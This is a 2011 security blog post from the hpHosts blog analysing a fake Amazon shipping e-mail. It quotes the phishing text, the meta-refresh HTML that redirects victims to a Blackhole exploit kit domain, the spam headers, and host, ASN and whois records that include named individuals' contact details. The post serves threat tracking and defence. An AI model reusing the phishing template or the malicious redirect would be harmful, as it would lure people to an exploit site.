Blog for hpHosts, and whatever else I feel like writing about ....

Friday 9 December 2011

Blackhole exploit: For those wondering, Part 4 - Now its Amazons turn

This one came in whilst I was asleep, no JS MITMs this time, just the link in the e-mail that uses a meta refresh to redirect you to the domain housing the Blackhole exploit itself;

Hello,

Shipping Confirmation
Order # 651-5411744-0155168 <http://ar.news.assyrianchurch.com/wp-content/uploads/fgallery/stay.html>

Your estimated delivery date is:
Tuesday, December 13, 2011

Track your package <http://ar.news.assyrianchurch.com/wp-content/uploads/fgallery/stay.html> Thank you for shopping with us. We thought you'd like to know that we shipped this portion of your order separately to give you quicker service. You won't be charged any extra shipping fees, and the remainder of your order will follow as soon as those items become available. If you need to return an item from this shipment or manage other orders, please visit Your Orders <http://ar.news.assyrianchurch.com/wp-content/uploads/fgallery/stay.html> on Amazon.com <http://ar.news.assyrianchurch.com/wp-content/uploads/fgallery/stay.html> .

Shipment Details

Omron WFB-387U Fat Loss Monitor, Black $129.95
Item Subtotal: $129.95
Shipping & Handling: $0.00
Total Before Tax: $129.95
Shipment Total: $129.95
Paid by Visa: $129.95

You have only been charged for the items sent in this shipment. Per our policy, you only pay for items when we ship them to you.

Returns are easy. Visit our .
If you need further assistance with your order, please visit Customer Service <http://ar.news.assyrianchurch.com/wp-content/uploads/fgallery/stay.html> .

We hope to see you again soon!
Amazon.com


<html><header><META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://certerpen.info/main.php?page=525447c096f8efbf"></header></html><!-- f851b407dc236b90d847a111101a9a44e2556d0bdbfd2bc92ce43c40 -->


Headers:

Return-Path: <revenueku82@iicbelgium.com>
Delivered-To: services@it-mate.co.uk
X-Spam-Flag: YES
X-Spam-Score: 8.476
X-Spam-Level: ********
X-Spam-Status: Yes, score=8.476 tagged_above=-9999 required=1.3
tests=[BAYES_00=-1.9, FH_FAKE_RCVD_LINE=1.778,
FORGED_MUA_OUTLOOK=1.927, FORGED_OUTLOOK_HTML=0.021,
FORGED_OUTLOOK_TAGS=0.052, HK_RANDOM_FROM=0.999, HTML_MESSAGE=0.001,
HTML_MIME_NO_HTML_TAG=0.377, HTML_NONELEMENT_30_40=0.001,
MIME_HTML_ONLY=0.723, MIME_HTML_ONLY_MULTI=0.001,
MISSING_MIMEOLE=1.899, MPART_ALT_DIFF=0.79, RCVD_DOUBLE_IP_SPAM=1.808,
SPF_PASS=-0.001] autolearn=no
Received: from mail.mdmcommercial.com (mail.mdmcommercial.com [65.212.113.54])
by mail4.emailconfig.com (Postfix) with ESMTP id 4B607398367
for <services@it-mate.co.uk>; Fri, 9 Dec 2011 14:11:08 +0000 (GMT)
Message-ID: <BIZSSKOTQKLKBTZFODELFMIHZG9SrHPOO609002tchxqbox@madhuri.com>
From: "Iris Richey" <dutgbufyflnxbf@madhuri.com>
Reply-To: "Iris Richey" <dutgbufyflnxbf@madhuri.com>
To: <services@it-mate.co.uk>
Subject: [SPAM] Your Amazon.com order of "Omron WFB-387U Fat Loss ..." has
shipped!
Date: Fri, 9 Dec 2011 09:11:38 -0500
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="-----=2974_0591_72ZQJO398Y43.28BQ175EI"
X-Priority: 3
X-MSMail-Priority: Normal



Host: certerpen.info
IP: 91.195.11.42
IP PTR: Resolution failed
ASN: 43479 91.195.10.0/23 UKRNIC-AS Ukrstar

No surprises as far as the ASN of course;

inetnum: 91.195.10.0 - 91.195.11.255
netname: UKRSTAR-NET
descr: UkrStar ISP
descr: www.ukrstar.com
country: UA
org: ORG-UA98-RIPE
admin-c: SER50-RIPE
tech-c: WIRE88-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-END-MNT
mnt-lower: RIPE-NCC-END-MNT
mnt-by: UKRNIC-MNT
mnt-routes: UKRNIC-MNT
mnt-domains: UKRNIC-MNT
source: RIPE # Filtered

organisation: ORG-UA98-RIPE
org-name: UkrStar
org-type: OTHER
descr: www.ukrstar.com
address: Dal'nitskaya 46, room 404
address: Odessa 65005
address: Ukraine
phone: +380482390190
fax-no: +380482324245
e-mail: noc@ukrstar.com
admin-c: SER50-RIPE
tech-c: WIRE88-RIPE
mnt-ref: GLOBALNETWORKS-MNT
mnt-by: GLOBALNETWORKS-MNT
source: RIPE # Filtered

person: Sanin Sergey Victorovich
address: Deribasovskaya str., 12
address: Odessa 65027
address: Ukraine
phone: +380487771551
e-mail: ser-0@clan-0.com
nic-hdl: SER50-RIPE
mnt-by: GLOBALNETWORKS-MNT
source: RIPE # Filtered

person: Grigoretskiy Sergey Aalexandrovich
org: ORG-UA98-RIPE
address: Dal'nitskaya str., 46, room 404
address: Odessa 65005
address: Ukraine
phone: +380482390190
e-mail: sg@ukrstar.com
nic-hdl: WIRE88-RIPE
mnt-by: GLOBALNETWORKS-MNT
source: RIPE # Filtered

:: Information related to '91.195.10.0/23AS43479'

route: 91.195.10.0/23
descr: UKRNIC-IP-BLOCK
origin: AS43479
mnt-by: UKRNIC-MNT
source: RIPE # Filtered


I've had a few more of the ACH ones with the JS MITMs too, this time, the domain housing the payload, was;

Host: wonderfulwreath.com
IP: 46.45.137.205
IP PTR: 46-45-137-205.turkrdns.com
ASN: 42926 46.45.137.0/24 RADORE Radore Hosting Telekomunikasyon Hizmetleri San. ve Tic. Ltd. Sti.

References

Blackhole exploit: For those wondering, Part 3 - Fake Facebook e-mail
http://hphosts.blogspot.com/2011/12/blackhole-exploit-for-those-wondering_08.html

Blackhole exploit: For those wondering, Part 2
http://hphosts.blogspot.com/2011/12/blackhole-exploit-for-those-wondering_05.html

Blackhole exploit: For those wondering
http://hphosts.blogspot.com/2011/12/blackhole-exploit-for-those-wondering.html

Deobfuscate exploit kits using Malzilla
http://www.malwaredomainlist.com/forums/index.php?topic=4636

No comments: